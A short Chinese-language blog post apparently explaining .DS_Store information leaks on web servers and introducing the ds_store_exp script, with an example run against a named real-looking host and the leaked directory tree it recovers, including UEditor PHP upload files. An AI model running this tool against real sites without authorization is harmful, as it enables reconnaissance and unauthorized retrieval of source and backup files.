.DS_Store是Mac下Finder用来保存如何展示 文件/文件夹 的数据文件,每个文件夹下对应一个。

如果开发/设计人员将.DS_Store上传部署到线上环境,可能造成文件目录结构泄漏,特别是备份文件、源代码文件。

ds_store_exp 是一个.DS_Store 文件泄漏利用脚本,它解析.DS_Store文件并递归地下载文件到本地:?https://github.com/lijiejie/ds_store_exp

DS_Store parser is based on ds_store 1.1.0?。

一个示例

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
python ds_store_exp.py http://hd.zj.qq.com/themes/galaxyw/.DS_Store
 
hd.zj.qq.com/
└── themes
    └── galaxyw
        ├── app
           └── css
               └── style.min.css
        ├── cityData.min.js
        ├── images
           └── img
               ├── bghd.png
               ├── bgitemactivity.png
               ├── bgmaskerpop.png
               ├── btnbm.png
               ├── btnloginqq.png
               ├── btnloginwx.png
               ├── icoaddpic.png
               ├── icoaddress.png
               ├── icobm.png
               ├── icodurationtime.png
               ├── icopopclose.png
               ├── icorighttopdelete.png
               ├── pageloginhd.png
               ├── picmasker.png
               └── ticketselected.png
        └── member
            ├── assets
               ├── css
                  ├── acereset.css
                  └── antd.css
               └── lib
                   ├── cityData.min.js
                   └── ueditor
                       ├── index.html
                       ├── lang
                          └── zhcn
                              ├── images
                                 ├── copy.png
                                 ├── localimage.png
                                 ├── music.png
                                 └── upload.png
                              └── zhcn.js
                       ├── php
                          ├── action_crawler.php
                          ├── action_list.php
                          ├── action_upload.php
                          ├── config.json
                          ├── controller.php
                          └── Uploader.class.php
                       ├── ueditor.all.js
                       ├── ueditor.all.min.js
                       ├── ueditor.config.js
                       ├── ueditor.parse.js
                       └── ueditor.parse.min.js
            └── static
                ├── css
                   └── page.css
                ├── img
                   ├── bgtabletitle.png
                   ├── bgtabsay.png
                   ├── icoblackdisabled.png
                   ├── icoblackenabled.png
                   ├── icocoorptionperson.png
                   ├── icomissperson.png
                   ├── icomrperson.png
                   ├── icowhitedisabled.png
                   └── icowhiteenabled.png
                └── scripts
                    ├── js
                    └── lib
                        └── jquery.min.js
 
21 directories, 48 files

You may also like

No Comment

Comments are closed.